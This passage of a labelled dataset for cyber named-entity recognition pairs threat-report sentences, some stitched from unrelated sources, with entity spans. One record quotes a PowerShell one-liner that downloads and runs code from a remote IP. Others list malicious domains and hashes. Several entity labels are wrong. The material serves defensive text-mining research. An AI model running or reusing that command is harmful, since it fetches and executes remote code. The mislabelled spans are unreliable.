sideloaded to run the SysUpdate tool in a previous Emissary Panda campaign .", "spans": {"ORGANIZATION: Symantec": [[17, 25], [8302, 8310]], "THREAT_ACTOR: BlackEnergy": [[91, 102]], "ORGANIZATION: Group-IB": [[139, 147]], "TOOL: email": [[180, 185], [1232, 1237], [13027, 13032]], "ORGANIZATION: bank": [[202, 206], [13298, 13302]], "ORGANIZATION: employees": [[207, 216]], "TOOL: emails": [[252, 258]], "FILEPATH: Silence.Downloader": [[278, 296]], "FILEPATH: Silence.MainModule": [[366, 384]], "MALWARE: Trojan": [[413, 419]], "FILEPATH: CMD.exe": [[462, 469]], "MALWARE: malware": [[653, 660]], "THREAT_ACTOR: Hackers": [[692, 699], [1448, 1455]], "ORGANIZATION: high-tech companies": [[714, 733]], "ORGANIZATION: chemical": [[745, 753], [6089, 6097]], "ORGANIZATION: pharmaceutical": [[758, 772]], "THREAT_ACTOR: Winnti": [[928, 934], [1439, 1445], [1561, 1567]], "MALWARE: Thyssenkrupp": [[1352, 1364]], "ORGANIZATION: manufacturer": [[1485, 1497]], "MALWARE: Komplex": [[1578, 1585]], "THREAT_ACTOR: APT28": [[1622, 1627]], "THREAT_ACTOR: OceanLotus’": [[1705, 1716]], "ORGANIZATION: foreign governments": [[1869, 1888]], "ORGANIZATION: activists": [[1891, 1900]], "ORGANIZATION: dissidents": [[1907, 1917]], "THREAT_ACTOR: NewsBeef": [[1941, 1949]], "ORGANIZATION: Rapid7": [[2035, 2041], [2241, 2247]], "TOOL: Dropbox": [[2094, 2101]], "THREAT_ACTOR: APT10": [[2132, 2137], [2263, 2268], [3542, 3547], [3628, 3633], [3836, 3841], [3856, 3861], [5239, 5244], [9113, 9118]], "FILEPATH: ccSEUPDT.exe": [[2293, 2305]], "ORGANIZATION: Novetta’s": [[2344, 2353]], "THREAT_ACTOR: Lazarus": [[2374, 2381]], "THREAT_ACTOR: \bMagic Hound": [[2421, 2433]], "ORGANIZATION: energy": [[2478, 2484], [9751, 9757]], "ORGANIZATION: government": [[2487, 2497], [3446, 3456], [9764, 9774]], "ORGANIZATION: technology": [[2504, 2514]], "ORGANIZATION: FireEye": [[2643, 2650], [6641, 6648], [9340, 9347], [10322, 10329], [10465, 10472], [10908, 10915], [11279, 11286]], "THREAT_ACTOR: APT33": [[2661, 2666], [4443, 4448], [4709, 4714], [5309, 5314], [5431, 5436], [5552, 5557], [5576, 5581], [5779, 5784], [6310, 6315], [6476, 6481], [6752, 6757], [6886, 6891], [7716, 7721], [8204, 8209], [8350, 8355], [8494, 8499], [8820, 8825], [10279, 10284]], "ORGANIZATION: defense": [[2739, 2746]], "ORGANIZATION: aerospace": [[2749, 2758]], "ORGANIZATION: petrochemical": [[2763, 2776]], "ORGANIZATION: \bCTU": [[2793, 2797], [2982, 2986]], "THREAT_ACTOR: Mia Ash": [[2972, 2979]], "THREAT_ACTOR: COBALT GYPSY": [[3013, 3025]], "THREAT_ACTOR: Magic Hound": [[3232, 3243]], "FILEPATH: malware": [[3362, 3369]], "ORGANIZATION: private": [[3461, 3468]], "ORGANIZATION: organizations": [[3469, 3482]], "FILEPATH: samples": [[3574, 3581]], "ORGANIZATION: enSilo": [[3743, 3749]], "FILEPATH: sample": [[4033, 4039]], "ORGANIZATION: Recorded Future’s": [[4148, 4165], [6835, 6852]], "THREAT_ACTOR: APT33’s": [[4207, 4214], [7569, 7576]], "THREAT_ACTOR: Elfin": [[4229, 4234], [6026, 6031]], "ORGANIZATION: U.S. Cyber": [[4339, 4349]], "MALWARE: njRAT": [[5375, 5380]], "MALWARE: AdwindRAT": [[5495, 5504]], "MALWARE: RevengeRAT": [[5509, 5519]], "TOOL: webshells": [[6003, 6012], [14802, 14811], [15284, 15293], [15336, 15345], [15754, 15763], [16353, 16362], [16475, 16484]], "ORGANIZATION: Symantec’s": [[6015, 6025]], "ORGANIZATION: engineering": [[6075, 6086]], "ORGANIZATION: healthcare": [[6130, 6140]], "ORGANIZATION: Nasr Institute": [[6208, 6222]], "THREAT_ACTOR: Group": [[6243, 6248], [6860, 6865]], "THREAT_ACTOR: APT35": [[6318, 6323]], "THREAT_ACTOR: MUDDYWATER": [[6330, 6340]], "ORGANIZATION: Recorded Future": [[6440, 6455], [7428, 7443], [7969, 7984]], "THREAT_ACTOR: Insikt": [[6853, 6859]], "THREAT_ACTOR: Nasr": [[7124, 7128]], "ORGANIZATION: Insikt": [[7330, 7336], [7654, 7660]], "FILEPATH: PlugX": [[7743, 7748]], "ORGANIZATION: Insikt Group": [[8084, 8096]], "MALWARE: RAT": [[8679, 8682]], "MALWARE: Poison Ivy": [[9060, 9070]], "THREAT_ACTOR: APT34": [[9196, 9201], [9954, 9959], [9962, 9967], [10853, 10858], [11127, 11132]], "MALWARE: PowerShell": [[9219, 9229]], "ORGANIZATION: Advanced Practices": [[9411, 9429]], "MALWARE: APT34": [[9553, 9558]], "ORGANIZATION: financial": [[9739, 9748], [11628, 11637], [11981, 11990], [13170, 13179]], "ORGANIZATION: FireEye Labs": [[9824, 9836]], "MALWARE: PICKPOCKET": [[9902, 9912]], "ORGANIZATION: FireEye’s": [[10362, 10371], [10736, 10745]], "VULNERABILITY: exploit": [[10427, 10434], [16161, 16168]], "FILEPATH: TONEDEAF": [[10609, 10617], [11362, 11370]], "ORGANIZATION: victim organizations": [[10875, 10895]], "FILEPATH: VALUEVAULT": [[10987, 10997], [11373, 11383]], "FILEPATH: LONGWATCH": [[11002, 11011], [11390, 11399]], "MALWARE: tool": [[11019, 11023]], "FILEPATH: PICKPOCKET": [[11135, 11145]], "THREAT_ACTOR: Carbanak": [[11449, 11457], [11659, 11667], [12365, 12373], [13079, 13087]], "ORGANIZATION: banks": [[11776, 11781]], "MALWARE: framework": [[11914, 11923]], "ORGANIZATION: Banks": [[12026, 12031]], "FILEPATH: spearphishing emails": [[12256, 12276]], "MALWARE: Cobalt Strike": [[12419, 12432]], "THREAT_ACTOR: Bitdefender’s": [[12900, 12913], [14067, 14080]], "ORGANIZATION: bank’s": [[13056, 13062]], "THREAT_ACTOR: Its": [[13213, 13216]], "THREAT_ACTOR: actors": [[13620, 13626], [15788, 15794], [15976, 15982], [16128, 16134], [16422, 16428]], "MALWARE: dumping credentials": [[13740, 13759]], "THREAT_ACTOR: Emissary Panda": [[13845, 13859], [14477, 14491], [14938, 14952], [16061, 16075], [16316, 16330], [16605, 16619], [16734, 16748], [17574, 17588], [18182, 18196]], "VULNERABILITY: vulnerability": [[13889, 13902]], "ORGANIZATION: Microsoft": [[13906, 13915]], "VULNERABILITY: CVE-2019-0604": [[13938, 13951], [15557, 15570], [16144, 16157]], "ORGANIZATION: financial transactions": [[14335, 14357]], "ORGANIZATION: ATM networks": [[14361, 14373]], "MALWARE: China Chopper webshell": [[14394, 14416], [16203, 16225]], "VULNERABILITY: CVE-2017-0144": [[14582, 14595], [16928, 16941]], "TOOL: DLL": [[14865, 14868], [17500, 17503]], "ORGANIZATION: Cyber Security Center": [[15623, 15644]], "ORGANIZATION: Canadian Center": [[15653, 15668]], "MALWARE: HyperBro": [[16018, 16026], [16692, 16700]], "ORGANIZATION: Unit 42": [[16276, 16283]], "ORGANIZATION: government organizations": [[16374, 16398]], "MALWARE: HyperBro backdoor": [[16443, 16460]], "THREAT_ACTOR: actor": [[16651, 16656]], "FILEPATH: etool.exe": [[16875, 16884]], "VULNERABILITY: EternalBlue": [[16944, 16955]], "FILEPATH: MS07-010": [[16969, 16977]], "TOOL: PsExec": [[17077, 17083]], "TOOL: Impacket": [[17095, 17103]], "FILEPATH: psexec.exe": [[17106, 17116]], "FILEPATH: stylecss.aspx": [[17189, 17202]], "FILEPATH: China Chopper": [[17274, 17287]], "FILEPATH: HyperBro": [[17325, 17333]], "ORGANIZATION: NCC": [[17380, 17383], [17541, 17544]], "MALWARE: hack tools": [[17631, 17641]], "MALWARE: Mimikatz": [[17652, 17660]], "MALWARE: python scripts": [[17705, 17719]], "FILEPATH: PYTHON33.dll": [[17991, 18003]], "FILEPATH: inicore_v2.3.30.dll": [[18016, 18035]], "FILEPATH: 4d65d371a789aabe1beadcc10b38da1f998cd3ec87d4cc1cfbf0af014b783822": [[18052, 18116]], "MALWARE: SysUpdate": [[18153, 18162]]}, "info": {"id": "cyberner_stix_train_006446", "source": "cyberner_stix_train"}}
{"text": "After deobfuscation we extracted :", "spans": {"TOOL: deobfuscation": [[6, 19]]}, "info": {"id": "cyberner_stix_train_006447", "source": "cyberner_stix_train"}}
{"text": "According to the DroidVPN app description , it “ helps bypass regional internet restrictions , web filtering and firewalls by tunneling traffic over ICMP. ” Some features may require devices to be rooted to function and according to some 3rd party app stores , unconditional rooting is required , which has additional security implications for the device . The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems . However , the malware shared several traits with the RIPTIDE and HIGHTIDE backdoor that we have attributed to APT12 .", "spans": {"MALWARE: Trojan": [[390, 396]], "MALWARE: RIPTIDE": [[538, 545]], "MALWARE: HIGHTIDE backdoor": [[550, 567]], "THREAT_ACTOR: APT12": [[595, 600]]}, "info": {"id": "cyberner_stix_train_006448", "source": "cyberner_stix_train"}}
{"text": "In contrast , on the emulator , a toast message is displayed that shows “ Install completed ” , at which point FakeSpy removes its shortcut from the device 's homescreen . FIN7’s last campaigns were targeting banks in Europe and Central America . At least one of the attacks in this campaign leveraged a European security and defense-themed lure , which aligns with the targeting preferences for this group .", "spans": {"MALWARE: FakeSpy": [[111, 118]], "THREAT_ACTOR: FIN7’s": [[172, 178]], "ORGANIZATION: banks": [[209, 214]]}, "info": {"id": "cyberner_stix_train_006449", "source": "cyberner_stix_train"}}
{"text": "PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . The developers refer to this tool by the name Kazuar , which is a Trojan written using the Microsoft.NET Framework that offers actors complete access to compromised systems targeted by its operator .", "spans": {"TOOL: PIVY": [[0, 4], [266, 270]], "ORGANIZATION: government agencies": [[96, 115]], "ORGANIZATION: defense contractors": [[118, 137]], "THREAT_ACTOR: attackers": [[208, 217]], "VULNERABILITY: zero-day vulnerability": [[225, 247]], "MALWARE: Kazuar": [[327, 333]], "MALWARE: Trojan": [[347, 353]]}, "info": {"id": "cyberner_stix_train_006450", "source": "cyberner_stix_train"}}
{"text": "Afterward , it will start several timers to execute different tasks . The Gamaredon Group has been actively launching spear-phishing attacks against Ukrainian government and military departments from the mid-2013s . In April 2017 , APT37 targeted South Korean military and government organizations with the DOGCALL backdoor and RUHAPPY wiper malware .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[74, 89]], "ORGANIZATION: government": [[159, 169]], "ORGANIZATION: military": [[174, 182], [260, 268]], "THREAT_ACTOR: APT37": [[232, 237]], "ORGANIZATION: government organizations": [[273, 297]], "MALWARE: DOGCALL backdoor": [[307, 323]], "MALWARE: RUHAPPY wiper malware": [[328, 349]]}, "info": {"id": "cyberner_stix_train_006451", "source": "cyberner_stix_train"}}
{"text": "Sending SMS messages to financial institutions to query account balances . In the past , BlackOasis messages were designed to appear like news articles from 2016 about political relations between Angola and China . The first one is the setting of the registry key “ HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\ ” & Application.Version & _ ” \\Word\\Security\\ ” and the declaration of some other variables , such as the dropurl “ geticons.ddns.net ” . In November 2016 , Volexity documented new Dukes - related activity involving spear phishing with links to a ZIP archive containing a malicious LNK file , which would run PowerShell commands to install a new custom backdoor called PowerDuke .", "spans": {"THREAT_ACTOR: BlackOasis": [[89, 99]], "ORGANIZATION: political": [[168, 177]], "ORGANIZATION: Volexity": [[466, 474]], "MALWARE: Dukes": [[490, 495]], "MALWARE: PowerDuke": [[678, 687]]}, "info": {"id": "cyberner_stix_train_006452", "source": "cyberner_stix_train"}}
{"text": "This is a common technique used by malware developers to bundle the main payload inside the Android package to avoid easy detection . The most popular targets of SneakyPastes are embassies , government entities , education , media outlets , journalists , activists , political parties or personnel , healthcare and banking . This secondary communication channel may be used by operators when access to the hard-coded control servers is disrupted .", "spans": {"SYSTEM: Android": [[92, 99]], "THREAT_ACTOR: SneakyPastes": [[162, 174]], "ORGANIZATION: embassies": [[179, 188]], "ORGANIZATION: government entities": [[191, 210]], "ORGANIZATION: education": [[213, 222]], "ORGANIZATION: media outlets": [[225, 238]], "ORGANIZATION: activists": [[255, 264]], "ORGANIZATION: personnel": [[288, 297]], "ORGANIZATION: healthcare": [[300, 310]], "ORGANIZATION: banking": [[315, 322]]}, "info": {"id": "cyberner_stix_train_006453", "source": "cyberner_stix_train"}}
{"text": "The file was created at C:\\Documents and Settings\\Admin\\Local Settings\\Temp\\sloo.exe .", "spans": {"FILEPATH: Settings\\Temp\\sloo.exe": [[62, 84]]}, "info": {"id": "cyberner_stix_train_006454", "source": "cyberner_stix_train"}}
{"text": "] com hxxp : //mailsa-qaf [ . In October 2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations' , and characterized APT28 's activity as aligning with the Russian Government 's strategic intelligence requirements . After the send operation is complete, the lock file for the current run is deleted and the script . In addition , Hack520 ’s tweets always show photos of the same animal , which is likely his pet pig .", "spans": {"ORGANIZATION: FireEye": [[48, 55]], "THREAT_ACTOR: APT28": [[65, 70], [145, 150]], "THREAT_ACTOR: Hack520": [[358, 365]]}, "info": {"id": "cyberner_stix_train_006455", "source": "cyberner_stix_train"}}
{"text": "A TrickMo Kill Switch One of the most interesting features of the TrickMo malware is having its own kill switch . Another attack group , Earworm ( aka Zebrocy ) , has been active since at least May 2016 and is involved in what appears to be intelligence gathering operations against military targets in Europe , Central Asia , and Eastern Asia . After getting the IP , the ProjectSauron component tries to communicate with the remote server using its own ( ProjectSauron ) protocol as if it was yet another C&C server .", "spans": {"MALWARE: TrickMo": [[2, 9]], "MALWARE: TrickMo malware": [[66, 81]], "THREAT_ACTOR: attack group": [[122, 134]], "THREAT_ACTOR: Earworm": [[137, 144]], "THREAT_ACTOR: Zebrocy": [[151, 158]], "MALWARE: ProjectSauron": [[373, 386], [457, 470]], "TOOL: C&C": [[507, 510]]}, "info": {"id": "cyberner_stix_train_006456", "source": "cyberner_stix_train"}}
{"text": "It is noteworthy that BusyGasper supports the IRC protocol which is rarely seen among Android malware . In this latest discovery by McAfee , despite a short pause in similar operations , the Lazarus group targets financial organizations . At the same time , code embedded within this file also executed a powershell command to download and execute a copy of chfeeds.vbe from the C&C server . [System.Net.ServicePointManager] : :S erverCertificateValidationCallback={$true};IEX (New-Object Net.WebClient ) .DownloadString ( ' https://217.147.168.46:8088/index.jpg ' ) . Other big stories in June include a suspected LockBit affiliate arrest , the Royal ransomware gang toying with a new encryptor , and a notable increase in attacks on the Manufacturing sector .", "spans": {"MALWARE: BusyGasper": [[22, 32]], "SYSTEM: Android": [[86, 93]], "ORGANIZATION: McAfee": [[132, 138]], "THREAT_ACTOR: Lazarus group": [[191, 204]], "ORGANIZATION: financial organizations": [[213, 236]], "TOOL: powershell": [[305, 315]], "FILEPATH: chfeeds.vbe": [[358, 369]], "TOOL: C&C server": [[379, 389]], "URL: https://217.147.168.46:8088/index.jpg": [[525, 562]], "THREAT_ACTOR: LockBit": [[615, 622]], "THREAT_ACTOR: Royal ransomware gang": [[646, 667]], "TOOL: new encryptor": [[682, 695]], "ORGANIZATION: Manufacturing sector": [[739, 759]]}, "info": {"id": "cyberner_stix_train_006457", "source": "cyberner_stix_train"}}
{"text": "TRITON Attribution : Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers .", "spans": {"MALWARE: TRITON": [[0, 6], [95, 101]]}, "info": {"id": "cyberner_stix_train_006458", "source": "cyberner_stix_train"}}
{"text": "ejtmjealr.com gefinsioje.com gesofgamd.com ponedobla.bit .", "spans": {"DOMAIN: ejtmjealr.com": [[0, 13]], "DOMAIN: gefinsioje.com": [[14, 28]], "DOMAIN: gesofgamd.com": [[29, 42]], "DOMAIN: ponedobla.bit": [[43, 56]]}, "info": {"id": "cyberner_stix_train_006459", "source": "cyberner_stix_train"}}
{"text": "We therefore believe the Dukes to be a single , large , wellcoordinated organization with clear separation of responsibilities and targets .", "spans": {"THREAT_ACTOR: Dukes": [[25, 30]]}, "info": {"id": "cyberner_stix_train_006460", "source": "cyberner_stix_train"}}
{"text": "This host was registered in late March and appears to be unique to this campaign .", "spans": {}, "info": {"id": "cyberner_stix_train_006461", "source": "cyberner_stix_train"}}
{"text": "The body contains a message and URL . As a result of our analysis of APT10 's activities , we believe that it almost certainly benefits from significant staffing and logistical resources , which have increased over the last three years , with a significant step-change in 2016 . OceanLotus : stellefaff.com 7244 . While COSMICENERGY ’s capabilities are not significantly different from previous OT malware families ’ , its discovery highlights several notable developments in the OT threat landscape .", "spans": {"THREAT_ACTOR: APT10": [[69, 74]], "THREAT_ACTOR: OceanLotus": [[279, 289]], "DOMAIN: stellefaff.com": [[292, 306]], "MALWARE: COSMICENERGY ’s": [[320, 335]], "MALWARE: OT malware families": [[395, 414]]}, "info": {"id": "cyberner_stix_train_006462", "source": "cyberner_stix_train"}}
{"text": "It has modular architecture implemented in the form of plugins , or it can receive new .NET source code , which will be compiled on the device in runtime . From the beginning of 2019 until July , we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia , Central Asia and regions of Ukraine with ongoing military conflicts . In 2017 , APT37 targeted a Middle Eastern company that entered into a joint venture with the North Korean government to provide telecommunications service to the country ( read on for a case study ) .", "spans": {"SYSTEM: .NET": [[87, 91]], "THREAT_ACTOR: threat actor": [[277, 289]], "THREAT_ACTOR: APT37": [[397, 402]], "ORGANIZATION: company": [[429, 436]], "ORGANIZATION: telecommunications service": [[515, 541]]}, "info": {"id": "cyberner_stix_train_006463", "source": "cyberner_stix_train"}}
{"text": "The command is translated to an IPacket of type GetSystemInfo .", "spans": {}, "info": {"id": "cyberner_stix_train_006464", "source": "cyberner_stix_train"}}
{"text": "On disk artefacts File with the full path : %AppData%\\Video\\videodrv.exe File with the full path : %AppData%\\Platform\\sslwin.exe Files with following file hashes .", "spans": {"FILEPATH: %AppData%\\Video\\videodrv.exe": [[44, 72]], "FILEPATH: %AppData%\\Platform\\sslwin.exe": [[99, 128]]}, "info": {"id": "cyberner_stix_train_006465", "source": "cyberner_stix_train"}}
{"text": "Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 .", "spans": {"THREAT_ACTOR: Patchwork": [[9, 18]], "MALWARE: RTF files": [[45, 54]], "VULNERABILITY: CVE-2017-8570": [[66, 79]], "FILEPATH: malicious.DOC": [[168, 181]], "VULNERABILITY: exploit": [[191, 198]], "ORGANIZATION: Microsoft": [[201, 210]], "TOOL: Common Controls": [[211, 226]], "VULNERABILITY: vulnerability": [[227, 240]], "VULNERABILITY: CVE-2012-0158": [[243, 256]]}, "info": {"id": "cyberner_stix_train_006466", "source": "cyberner_stix_train"}}
{"text": "As with most Android ransomware , this new threat doesn ’ t actually block access to files by encrypting them . Leveraging click counts for the campaign for Bitly , we were able to see Gorgon Group 's activity volume increase throughout April . a conditional jump of the dispatcher predecessor’s tail instruction in goto N predecessors case , SysUpdate is a featurerich backdoor that has multiple capabilities , including", "spans": {"SYSTEM: Android": [[13, 20]], "TOOL: Bitly": [[157, 162]], "THREAT_ACTOR: Gorgon Group": [[185, 197]], "MALWARE: SysUpdate": [[343, 352]]}, "info": {"id": "cyberner_stix_train_006467", "source": "cyberner_stix_train"}}
{"text": "In the past few months , Unit 42 has observed the Patchwork group , alternatively known as Dropping Elephant and Monsoon , conducting campaigns against targets located in the Indian subcontinent . Trend Micro specifically noted that the 2013 versions of KeyBoy used the same algorithm for encoding their configuration files as was observed in the Operation Tropic Trooper malware .", "spans": {"ORGANIZATION: Unit 42": [[25, 32]], "THREAT_ACTOR: Patchwork group": [[50, 65]], "THREAT_ACTOR: Dropping Elephant": [[91, 108]], "THREAT_ACTOR: Monsoon": [[113, 120]], "ORGANIZATION: Trend Micro": [[197, 208]], "MALWARE: KeyBoy": [[254, 260]]}, "info": {"id": "cyberner_stix_train_006468", "source": "cyberner_stix_train"}}
{"text": "WE STILL CAN SELLING IT FOR SPAM , FAKE , BANK CRIME etc… We collect and download all of your personal data . They are selective in their attacks and wait for about three months between incidents , which is approximately three times longer than other financially motivated APT groups , like MoneyTaker , Anunak ( Carbanak ) , Buhtrap or Cobalt . We have a high level of confidence in a historic association between FIN7 and Cobalt , even though we believe that these two clusters of activity are operated by different teams . If scripts are not commonly used on a system , but enabled , scripts running out of cycle from patching or other administrator functions are suspicious .", "spans": {"THREAT_ACTOR: FIN7": [[415, 419]], "MALWARE: Cobalt": [[424, 430]]}, "info": {"id": "cyberner_stix_train_006469", "source": "cyberner_stix_train"}}
{"text": "This makes it impossible to create a target profile . LYCEUM is an emerging threat to energy organizations in the Middle East , but organizations should not assume that future targeting will be limited to this sector . Since at least the beginning of 2014 , APT38 operations have focused almost exclusively on developing and conducting financially motivated campaigns targeting international entities , whereas TEMP.Hermit is generally linked to operations focused on South Korea and the United States .", "spans": {"THREAT_ACTOR: LYCEUM": [[54, 60]], "ORGANIZATION: energy organizations": [[86, 106]], "THREAT_ACTOR: APT38": [[258, 263]], "ORGANIZATION: international entities": [[378, 400]], "THREAT_ACTOR: TEMP.Hermit": [[411, 422]]}, "info": {"id": "cyberner_stix_train_006470", "source": "cyberner_stix_train"}}
{"text": "Much like the CosmicDuke toolset , the loader used by both MiniDuke and CosmicDuke had previously only undergone one major update ( the Nemesis Gemina upgrade ) since the first known samples from 2010 .", "spans": {"MALWARE: CosmicDuke": [[14, 24], [72, 82]], "MALWARE: MiniDuke": [[59, 67]], "MALWARE: Nemesis Gemina": [[136, 150]]}, "info": {"id": "cyberner_stix_train_006471", "source": "cyberner_stix_train"}}
{"text": "Of note is TA505 ’s use of the Necurs botnet to drive their massive spam campaigns .", "spans": {"THREAT_ACTOR: TA505": [[11, 16]], "MALWARE: Necurs": [[31, 37]]}, "info": {"id": "cyberner_stix_train_006472", "source": "cyberner_stix_train"}}
{"text": "So far , the attackers relied entirely on social engineering to infect the targets . Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users . We have been presented with a rare opportunity to see some development activities from the actors associated with the OilRig attack campaign , a campaign Unit 42 has been following since May 2016 .", "spans": {"VULNERABILITY: Nitris Exploit Kit": [[112, 130]], "VULNERABILITY: CottonCastle": [[152, 164]], "THREAT_ACTOR: actors": [[332, 338]], "ORGANIZATION: Unit 42": [[395, 402]]}, "info": {"id": "cyberner_stix_train_006473", "source": "cyberner_stix_train"}}
{"text": "They also download apks secretly and record audios and videos , then upload users’ privacy information to server , causing users’ privacy leakage . We dove deeper into Confucius' operations—namely , the malware-ridden documents , backdoors , and file stealers they use in their campaigns .", "spans": {"MALWARE: They": [[0, 4]]}, "info": {"id": "cyberner_stix_train_006474", "source": "cyberner_stix_train"}}
{"text": "Next , if they indicate that they use an Android-based device , the Trojan , impersonating their bank with web injections , fools the victim into installing a fake security app . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . The January 8 attack used a variant of the ThreeDollars delivery document , which we identified as part of the OilRig toolset based on attacks that occurred in August 2017 .", "spans": {"SYSTEM: Android-based": [[41, 54]], "MALWARE: archive": [[193, 200]], "VULNERABILITY: vulnerability": [[261, 274]], "FILEPATH: ThreeDollars delivery document": [[355, 385]], "THREAT_ACTOR: OilRig": [[423, 429]]}, "info": {"id": "cyberner_stix_train_006475", "source": "cyberner_stix_train"}}
{"text": "PACKING In addition to implementing custom obfuscation techniques , apps have used several commercially available packers including : Qihoo360 , AliProtect and SecShell . In the Bahamut report , we discussed two domains found within our search that were linked with a custom Android malware agent . Unlike zxFunction001, this is not used by The SCIL commands would have caused the MicroSCADA server to relay the commands to the substation RTUs via either the IEC-60870 - 5 - 104 protocol for TCP / IP connections or the IEC-60870 - 5 - 101 protocol for serial connections .", "spans": {"SYSTEM: Qihoo360": [[134, 142]], "SYSTEM: AliProtect": [[145, 155]], "SYSTEM: SecShell": [[160, 168]], "TOOL: domains": [[212, 219]], "TOOL: custom Android malware agent": [[268, 296]], "SYSTEM: MicroSCADA server": [[381, 398]]}, "info": {"id": "cyberner_stix_train_006476", "source": "cyberner_stix_train"}}
{"text": "It leveraged DDE to retrieve and install a payload onto the victim host .", "spans": {}, "info": {"id": "cyberner_stix_train_006477", "source": "cyberner_stix_train"}}
{"text": "The Poseidon Group is a long-running team operating on all domains : land , air , and sea . This attack campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes .", "spans": {"THREAT_ACTOR: Poseidon Group": [[4, 18]], "ORGANIZATION: chemical sector": [[128, 143]]}, "info": {"id": "cyberner_stix_train_006478", "source": "cyberner_stix_train"}}
{"text": "The fake doesn ’ t quite nail the app name . We assess with high confidence that APT37 acts in support of the North Korean government and is primarily based in North Korea . Exfiltration is done through the bitsadmin.exe . “ And his access was never shut off until today ? , ” asked the company ’s general counsel Mike Dacks .", "spans": {"THREAT_ACTOR: APT37": [[81, 86]], "FILEPATH: bitsadmin.exe": [[207, 220]], "ORGANIZATION: company ’s general counsel": [[287, 313]], "ORGANIZATION: Mike Dacks": [[314, 324]]}, "info": {"id": "cyberner_stix_train_006479", "source": "cyberner_stix_train"}}
{"text": "Strong evidence links BRONZE PRESIDENT 's infrastructure to entities within the PRC .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[22, 38]], "ORGANIZATION: PRC": [[80, 83]]}, "info": {"id": "cyberner_stix_train_006480", "source": "cyberner_stix_train"}}
{"text": "CTU researchers immediately recognized suspicious commands , such as changing the working directory to recycler and executing commands from that location , that were unlikely to have been connected to legitimate system administrator operations .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_006481", "source": "cyberner_stix_train"}}
{"text": "The source process tries to determine the location of dlopen , dlsym , and dlclose functions in the target process . The first Potao campaign that we examined took place in August 2011 . APT17 : 195ade342a6a4ea0a58cfbfb43dc64cb . While inspecting one of the C&C servers of Miniduke , we have found files that were not related to the C&C code , but seemed to be prepared for infecting visitors using web - based vulnerabilities .", "spans": {"THREAT_ACTOR: APT17": [[187, 192]], "FILEPATH: 195ade342a6a4ea0a58cfbfb43dc64cb": [[195, 227]], "SYSTEM: C&C servers": [[258, 269]], "MALWARE: Miniduke": [[273, 281]]}, "info": {"id": "cyberner_stix_train_006482", "source": "cyberner_stix_train"}}
{"text": "The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine . The interest among hackers in targeting trading systems is expected to grow .", "spans": {"MALWARE: Silence.Downloader": [[17, 35]]}, "info": {"id": "cyberner_stix_train_006483", "source": "cyberner_stix_train"}}
{"text": "In this campaign , the attackers use different TTPs and decoy documents reminiscent of previous campaigns by MoleRATs involving the Micropsia and Kaperagent malware .", "spans": {"THREAT_ACTOR: MoleRATs": [[109, 117]], "MALWARE: Micropsia": [[132, 141]], "MALWARE: Kaperagent": [[146, 156]]}, "info": {"id": "cyberner_stix_train_006484", "source": "cyberner_stix_train"}}
{"text": "While the loader has often been used together with other MiniDuke components , it has also commonly been used in conjunction with CosmicDuke and PinchDuke .", "spans": {"TOOL: loader": [[10, 16]], "MALWARE: MiniDuke": [[57, 65]], "MALWARE: CosmicDuke": [[130, 140]], "MALWARE: PinchDuke": [[145, 154]]}, "info": {"id": "cyberner_stix_train_006485", "source": "cyberner_stix_train"}}
{"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . Clever Kitten actors have a strong affinity for PHP server-side attacks to make access ; this is relatively unique amongst targeted attackers who often favor targeting a specific individual at a specific organization using social engineering .", "spans": {"MALWARE: files": [[4, 9]], "VULNERABILITY: Microsoft Office vulnerability": [[33, 63]], "VULNERABILITY: CVE-2012-0158": [[66, 79]], "THREAT_ACTOR: Clever Kitten": [[159, 172]], "ORGANIZATION: individual": [[338, 348]], "ORGANIZATION: social engineering": [[382, 400]]}, "info": {"id": "cyberner_stix_train_006486", "source": "cyberner_stix_train"}}
{"text": "The PinchDuke information stealer gathers system configuration information , steals user credentials , and collects user files from the compromised host transferring these via HTTP (S ) to a C&C server .", "spans": {"MALWARE: PinchDuke": [[4, 13]], "TOOL: information stealer": [[14, 33]], "TOOL: C&C": [[191, 194]]}, "info": {"id": "cyberner_stix_train_006487", "source": "cyberner_stix_train"}}
{"text": "They have extensive checks for the various security software that is installed on the system and their specific configurations .", "spans": {}, "info": {"id": "cyberner_stix_train_006488", "source": "cyberner_stix_train"}}
{"text": "Although the applications were never available in Google Play , we immediately identified the scope of the problem by using Verify Apps . The EternalBlue exploit from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 . gaming industry scope attackers asia . Significantly , Anonymous Sudan has caused significant disruptions at a level not observed by KillNet affiliates previously .", "spans": {"SYSTEM: Google Play": [[50, 61]], "SYSTEM: Verify Apps": [[124, 135]], "VULNERABILITY: EternalBlue exploit": [[142, 161]], "TOOL: Petya": [[275, 280]], "TOOL: NotPetya": [[283, 291]], "THREAT_ACTOR: Anonymous Sudan": [[362, 377]]}, "info": {"id": "cyberner_stix_train_006489", "source": "cyberner_stix_train"}}
{"text": "The size of the botnet however ( about 1400 bots ) is very small if its intended use is for commercial DoS attacks or spam-sending .", "spans": {"TOOL: DoS": [[103, 106]]}, "info": {"id": "cyberner_stix_train_006490", "source": "cyberner_stix_train"}}
